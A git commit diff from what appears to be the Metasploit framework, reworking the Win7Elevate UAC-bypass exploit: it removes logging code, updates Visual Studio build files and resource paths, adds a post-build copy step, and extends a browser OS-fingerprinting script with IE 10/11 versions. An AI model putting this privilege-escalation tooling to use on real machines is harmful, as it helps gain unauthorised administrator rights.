Merge remote-tracking branch 'upstream/master' into bypassuac_redo

Conflicts:
	external/source/exploits/make.bat
Meatballs 2014-02-28 20:26:24 +00:00
commit 2a6258be15
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
40 changed files with 1056 additions and 392 deletions

View File

@ -196,8 +196,7 @@ window.os_detect.getVersion = function(){
if (!ua_version || 0 == ua_version.length) {
ua_is_lying = true;
}
} else if (!document.all && navigator.taintEnabled ||
'MozBlobBuilder' in window) {
} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
// Use taintEnabled to identify FF since other recent browsers
// implement window.getComputedStyle now. For some reason, checking for
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
@ -882,6 +881,18 @@ window.os_detect.getVersion = function(){
os_flavor = "7";
os_sp = "SP1";
break;
case "11016428":
// IE 11.0.9600.16428 / Windows 7 SP1
ua_version = "11.0";
os_flavor = "7";
os_sp = "SP1";
break;
case "10016384":
// IE 10.0.9200.16384 / Windows 8 x86
ua_version = "10.0";
os_flavor = "8";
os_sp = "SP0";
break;
case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0";

Binary file not shown.

Binary file not shown.

127
external/source/exploits/bypassuac/CMMN.cpp vendored Normal file → Executable file
View File

@ -8,46 +8,6 @@
#include <windows.h>
#include <WinIOCtl.h>
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
std::wstring CError::Format( DWORD ErrorCode )
{
return Format( ErrorCode, NULL, NULL );
}
std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API)
{
LPVOID lpvMessageBuffer;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
NULL, ErrorCode,
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
(LPTSTR)&lpvMessageBuffer, 0, NULL);
std::wstring result;
std::wostringstream es(TEXT(""));
es << ErrorCode;
if ( Title )
{ result.append( Title ); result.append( TEXT("\n") ); }
else
{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
if ( API )
{ result.append( TEXT("API = ") );result.append( API ); result.append( TEXT("\n") ); }
result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
if( lpvMessageBuffer )
{ result.append( TEXT("message = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
if ( lpvMessageBuffer )
{ LocalFree(lpvMessageBuffer); }
return result;
}
/*************************************************************************************************/
/*************************************************************************************************/
@ -142,90 +102,3 @@ CInterprocessStorage::~CInterprocessStorage()
CloseHandle( _hMapping );
}
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
std::wstring CLogger::GetPath()
{
std::wstring path;
TCHAR buffer[MAX_PATH];
if ( GetTempPath( MAX_PATH, buffer ) )
{
path.assign( buffer );
path.append( TEXT("w7e.log") );
}
return path;
}
void CLogger::Reset()
{
DeleteFile( GetPath().c_str() );
}
void CLogger::LogLine( std::wstring& Text )
{
std::wstring tmp( Text.c_str() );
tmp.append( TEXT("\n") );
Log( tmp );
}
void CLogger::LogLine( )
{
Log( TEXT("\n") );
}
void CLogger::LogLine( const TCHAR *Text )
{
if ( Text )
LogLine( std::wstring( Text ) );
}
void CLogger::Log( const TCHAR Char )
{
std::wstring tmp;
tmp.append( &Char, 1 );
Log( tmp );
}
void CLogger::Log( const TCHAR *Text )
{
if ( Text )
Log( std::wstring( Text ) );
}
void CLogger::Log( std::wstring& Text )
{
TCHAR buffer[MAX_PATH];
//
// We have to check it every time to be reflective if user created this file
// while program was runnig.
//
if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
{
std::wstring dbg( buffer );
dbg.append( TEXT(".debug") );
HANDLE hdbg = CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if ( INVALID_HANDLE_VALUE == hdbg )
return;
CloseHandle( hdbg );
}
HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
if ( mutex ) WaitForSingleObject( mutex , INFINITE );
HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
if( INVALID_HANDLE_VALUE != hFile )
{
SetFilePointer( hFile, 0, NULL, FILE_END );
DWORD written;
WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
CloseHandle( hFile );
}
if ( mutex ) ReleaseMutex( mutex );
if ( mutex ) CloseHandle( mutex );
}

21
external/source/exploits/bypassuac/Redirector.cpp vendored Normal file → Executable file
View File

@ -13,9 +13,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
assert( Parameter );
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
CLogger::Log( TEXT("Hello redirector thread: ") );
CLogger::LogLine( pair->Name );
CHAR read_buff[2];
DWORD nBytesRead,nBytesWrote;
@ -25,11 +22,7 @@ DWORD WINAPI Redirector( LPVOID Parameter )
{
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("ReadFile") ) );
error = true && (!pair->KeepAlive);
break;
}
@ -67,11 +60,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("WriteConsoleInput") ) );
error = true && (!pair->KeepAlive);
break;
}
@ -80,11 +68,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
{
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("WriteFile") ) );
error = true && (!pair->KeepAlive);
break;
}
@ -92,8 +75,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
}
}
CLogger::Log( TEXT("Bye redirector thread: ") );
CLogger::LogLine( pair->Name );
return EXIT_SUCCESS;
}

13
external/source/exploits/bypassuac/TIOR/TIOR.cpp vendored Normal file → Executable file
View File

@ -20,7 +20,6 @@
int _tmain(int argc, _TCHAR* argv[])
{
CLogger::LogLine(TEXT("TIOR: Hello"));
TRedirectorPair in = {0};
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
@ -79,9 +78,6 @@ int _tmain(int argc, _TCHAR* argv[])
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
CLogger::LogLine(TEXT("TIOR: shell=")); CLogger::LogLine(shell);
CLogger::LogLine(TEXT("TIOR: args=")); CLogger::LogLine(args);
CLogger::LogLine(TEXT("TIOR: dir=")); CLogger::LogLine(dir);
STARTUPINFO si = {0};si.cb = sizeof(si);
PROCESS_INFORMATION pi = {0};
@ -100,11 +96,6 @@ int _tmain(int argc, _TCHAR* argv[])
if ( ! created )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
TEXT("TIOR: Unable to create child process"),
TEXT("CreateProcess")));
return EXIT_FAILURE;
}
@ -113,14 +104,12 @@ int _tmain(int argc, _TCHAR* argv[])
CloseHandle( pi.hThread );
}
CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
//
// Waiting for eny handle to be freed.
// Either some IO thread will die or process will be oevered.
//
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));
//
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
@ -132,11 +121,9 @@ int _tmain(int argc, _TCHAR* argv[])
// Dont forget to close child process. We need to be sure, if user terminated app which
// reads our redirected data, we terminate the target child app.
//
CLogger::LogLine(TEXT("TIOR: Killing child process"));
TerminateProcess( pi.hProcess, EXIT_FAILURE );
CloseHandle( pi.hProcess );
CLogger::LogLine(TEXT("TIOR: Exit"));
//
// I will not close any handles here - system will terminate and close all by it self.

View File

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -28,23 +28,27 @@
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -63,26 +67,31 @@
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -90,6 +99,8 @@
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>false</MinimalRebuild>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@ -99,6 +110,10 @@
<Path>
</Path>
</BuildLog>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
@ -106,11 +121,17 @@
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>false</MinimalRebuild>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
@ -121,6 +142,7 @@
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@ -132,6 +154,10 @@
<Path>
</Path>
</BuildLog>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -142,6 +168,7 @@
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@ -153,6 +180,10 @@
<Path>
</Path>
</BuildLog>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />

17
external/source/exploits/bypassuac/Win7Elevate.sln vendored Normal file → Executable file
View File

@ -1,6 +1,8 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
ProjectSection(SolutionItems) = preProject
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
@ -18,37 +20,32 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.Build.0 = Debug|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.Build.0 = Debug|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.Build.0 = Debug|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64

BIN
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp vendored Normal file → Executable file

Binary file not shown.

17
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.rc vendored Normal file → Executable file
View File

@ -61,22 +61,23 @@ END
#ifdef _DEBUG
// Z:\code\metasploit-framework\external\source\exploits\bypassuac\TIOR\Debug\Win32
#ifdef _WIN64
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe"
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\x64\\Win7ElevateDll.x64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\x64\\TIOR.x64.exe"
#else
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe"
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\Win32\\Win7ElevateDll.x86.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\Win32\\TIOR.x86.exe"
#endif
#else // _DEBUG
#ifdef _WIN64
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe"
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\x64\\Win7ElevateDll.x64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\x64\\TIOR.x64.exe"
#else
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe"
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\Win32\\Win7ElevateDll.x86.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\Win32\\TIOR.x86.exe"
#endif
#endif

View File

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -28,23 +28,27 @@
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -63,25 +67,30 @@
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<LinkIncremental>false</LinkIncremental>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<LinkIncremental>false</LinkIncremental>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -96,10 +105,12 @@
<FunctionLevelLinking>false</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
</Link>
<BuildLog>
<Path>
@ -119,10 +130,12 @@
<FunctionLevelLinking>false</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
</Link>
<BuildLog>
<Path>
@ -141,12 +154,14 @@
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<BufferSecurityCheck>false</BufferSecurityCheck>
<WholeProgramOptimization>false</WholeProgramOptimization>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
</Link>
<BuildLog>
<Path>
@ -155,6 +170,9 @@
<ResourceCompile>
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -168,12 +186,14 @@
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<BufferSecurityCheck>false</BufferSecurityCheck>
<WholeProgramOptimization>false</WholeProgramOptimization>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
</Link>
<BuildLog>
<Path>
@ -182,6 +202,9 @@
<ResourceCompile>
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="Resource.h" />
@ -204,7 +227,10 @@
<ClCompile Include="Win7Elevate_Utils.cpp" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Win7Elevate.rc" />
<ResourceCompile Include="Win7Elevate.rc">
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WIN64;_WIN64;_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">

35
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp vendored Normal file → Executable file
View File

@ -209,7 +209,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
if (codeStartAdr >= codeEndAdr)
{
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Unexpected function layout");
return;
}
@ -220,7 +219,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
